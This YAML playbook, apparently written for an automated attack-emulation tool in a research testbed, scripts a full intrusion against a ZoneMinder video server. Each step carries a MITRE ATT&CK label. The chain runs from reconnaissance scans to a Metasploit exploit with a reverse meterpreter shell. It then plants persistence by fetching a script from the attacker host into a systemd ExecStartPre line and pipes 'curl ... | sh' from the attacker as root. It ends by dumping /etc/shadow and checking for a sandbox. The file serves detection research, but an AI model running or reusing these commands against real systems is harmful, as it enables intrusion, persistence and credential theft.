####################
#
# Scenario 1 c a
#
####################
vars:
  $SERVER_ADDRESS: video.attackbed.com
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $ADMIN_SERVER: 10.12.0.222
  $MGMT_IP: 192.42.0.201
  $MGMT_USERNAME: aecid
  $DOMAIN: attackbed.com
  $USER: aecid
  $DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
  $SSH_KEY: {{sshkey.public_key}}

commands:
  - type: shell
    cmd: 'echo "Target:  $SSH_KEY"'

  - type: shell
    cmd: dnsenum -f $DNS_LIST --dnsserver $DNS_SERVER $DOMAIN
    metadata:
      techniques: "T1590.002,T1591"
      tactics: "Reconnaissance"
      technique_name: "Gather Victim Network Information: DNS,Gather Victim Org Information"

  - type: shell
    cmd: sudo nmap -O -sT --top-ports 100 $SERVER_ADDRESS
    metadata:
      techniques: "T1595,T1592.002"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning,Gather Victim Host Information: Software"

  - type: shell
    cmd: "nikto -host $SERVER_ADDRESS"
    metadata:
      techniques: "T1595.002"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning: Vulnerability Scanning"

  # wazuh alerts arrive with delay of up to 15 seconds, therefore wait some time
  - type: sleep
    seconds: 30

  - type: shell
    cmd: "ffuf -w /usr/local/share/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://$SERVER_ADDRESS/FUZZ"
    metadata:
      techniques: "T1595.003"
      tactics: "Reconnaissance"
      technique_name: "Active Scanning: Wordlist Scanning"

  # additional access logs will be produced for around 60 seconds after finishing ffuf, therefore wait some time
  - type: sleep
    seconds: 90

  - type: msf-module
    cmd: exploit/unix/webapp/zoneminder_snapshots
    creates_session: "foothold"
    options:
      RHOSTS: 192.42.0.254
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp
    metadata:
      techniques: "T1190,T1059.006"
      tactics: "Initial Access"
      technique_name: "Exploit Public-Facing Application,Command and Scripting Interpreter: Python"

  - type: msf-session
    stdapi: True
    session: "foothold"
    cmd: cd /tmp

  - type: msf-session
    session: "foothold"
    cmd: upload /var/www/html/linpeas.sh
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"
      technique_name: "Ingress Tool Transfer"

  - type: msf-session
    cmd: shell
    session: "foothold"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export SHELL=bash
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: 'export PS1="PWN >"'
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: chmod +x linpeas.sh
    session: "foothold"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"

  - type: msf-session
    cmd: ./linpeas.sh -s -q -N 2> /dev/null
    session: "foothold"
    end_str: "PWN >"
    metadata:
      techniques: "T1087,T1083,T1201,T1069,T1057,T1518,T1082,T1614,T1016,T1049,T1033,T1007,T1615"
      tactics: "Discovery"
      technique_name: "Account Discovery,File and Directory Discovery,Password Policy Discover,Permission Groups Discovery,Process Discovery,Software Discovery,System Information Discovery,System Location Discovery,System Network Configuration Discovery,System Network Connections Discovery,System Owner/User Discovery,System Service Discovery,Group Policy Discovery"

  # wait a little bit for linpeas
  - type: sleep
    seconds: 600

  # This command fixes the outputbuffer
  # so that the output of the further
  # commands will work!
  - type: msf-session
    read: True
    cmd: id
    session: "foothold"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"

  - type: msf-session
    cmd: curl http://$ATTACKER_ADDRESS/TODO.md > /var/www/default/.zm_preload.sh
    session: "foothold"

  - type: msf-session
    cmd: vim /usr/lib/systemd/system/zoneminder.service
    session: "foothold"

  - type: msf-session
    cmd: ":inoremap jj <ESC>"
    session: "foothold"

  - type: msf-session
    cmd: "/[Service"
    session: "foothold"

  - type: msf-session
    cmd: "o"
    session: "foothold"

  - type: msf-session
    cmd: "ExecStartPre=bash /var/www/default/.zm_preload.sh &"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"
      technique_name: "Boot or Logon Autostart Execution"

  - type: msf-session
    cmd: "jj"
    session: "foothold"

  - type: msf-session
    cmd: ":wq!\n"
    session: "foothold"
    metadata:
      techniques: "T1547"
      tactics: "Persistence, Privilege Escalation"
      technique_name: "Boot or Logon Autostart Execution"

  - type: msf-session
    cmd: "exit"
    session: "foothold"

 # connect via jumphost to admin host, that ssh to videoserver to reboot
  - type: shell
    cmd: ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o "ProxyCommand=ssh -i ~/.ssh/attacker_mgmt -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -W %h:%p aecid@$MGMT_IP" aecid@$ADMIN_SERVER 'echo "ssh -i .ssh/rootkey -o StrictHostKeyChecking=no root@172.17.100.121 'reboot'" | at now + 2 minute' 


  - type: msf-module
    cmd: exploit/multi/handler
    creates_session: "root"
    payload_options:
      LHOST: 192.42.1.174
    payload: cmd/unix/python/meterpreter/reverse_tcp

  - type: msf-session
    stdapi: True
    cmd: "getuid"
    session: "root"

  - type: msf-session
    cmd: shell
    session: "root"

  - type: msf-session
    cmd: python3 -c "import pty;pty.spawn(\"/bin/bash\")";
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
      
  - type: msf-session
    cmd: export SHELL=bash
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: export TERM=xterm256-color
    session: "root"
    metadata:
      techniques: "T1059"
      tactics: "Execution"
      technique_name: "Command and Scripting Interpreter"
 
  - type: msf-session
    cmd: stty rows 38 columns 116
    session: "root"

  - type: msf-session
    cmd: id
    session: "root"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"

  - type: msf-session
    session: "root"
    cmd: "curl http://$ATTACKER_ADDRESS/README.txt.1 | sh"
    metadata:
      techniques: "T1105,T1098.004"
      tactics: "Command and Control,Persistence,Privilege Escalation"
      technique_name:"Ingress Tool Transfer,Account Manipulation: SSH Authorized Keys"

  - type: sleep
    seconds: 40

  - type: msf-session
    cmd: id
    read: True
    session: "root"
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"


# TODO: THIS COMMAND DOES NOT WORK
#       DON'T KNOW WHY
#  - type: msf-session
#    cmd: split --filter="/usr/bin/cat $FILE | /usr/bin/xargs /bin/bash -c " -C 2000 /root/README.txt
#    session: "root"
#    metadata:
#      techniques: "T1218,T1098.004"
#      tactics: "Defense Evasion,Persistence,Privilege Escalation"
#      technique_name: "System Binary Proxy Execution,Account Manipulation: SSH Authorized Keys"
#

#  - type: msf-session
#    cmd: rm /root/README.txt
#    session: "root"

  - type: msf-session
    cmd: exit
    session: "root"

  - type: msf-session
    cmd: exit
    session: "root"

  - type: sleep
    seconds: 30

  - type: ssh
    cmd: id
    hostname: 192.42.0.254
    port: 2222
    username: root
    key_filename: "/home/aecid/.ssh/attacker_key"
    creates_session: "rootshell"
    clear_cache: True
    metadata:
      techniques: "T1033"
      tactics: "Discovery"
      technique_name: "System Owner/User Discovery"

  - type: ssh
    cmd: pwd
    session: "rootshell"

  - type: ssh
    cmd: cat /etc/shadow
    session: "rootshell"
    metadata:
      techniques: "T1003.008"
      tactics: "Credential Access"
      technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow"

  - type: ssh
    cmd: lspci
    session: "rootshell"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"
      technique_name: "Peripheral Device Discovery"

  - type: ssh
    cmd: command -v lsusb
    session: "rootshell"
    metadata:
      techniques: "T1120"
      tactics: "Discovery"
      technique_name: "Peripheral Device Discovery"

  - type: ssh
    cmd: date
    session: "rootshell"
    metadata:
      techniques: "T1124"
      tactics: "Discovery"
      technique_name: "System Time Discovery"

  - type: ssh
    cmd: find /usr -name \*virtualbox\*
    session: "rootshell"
    metadata:
      techniques: "T1497.001"
      tactics: "Defense Evasion, Discovery"
      technique_name: "Virtualization/Sandbox Evasion: System Checks"

  - type: sleep
    seconds: 30
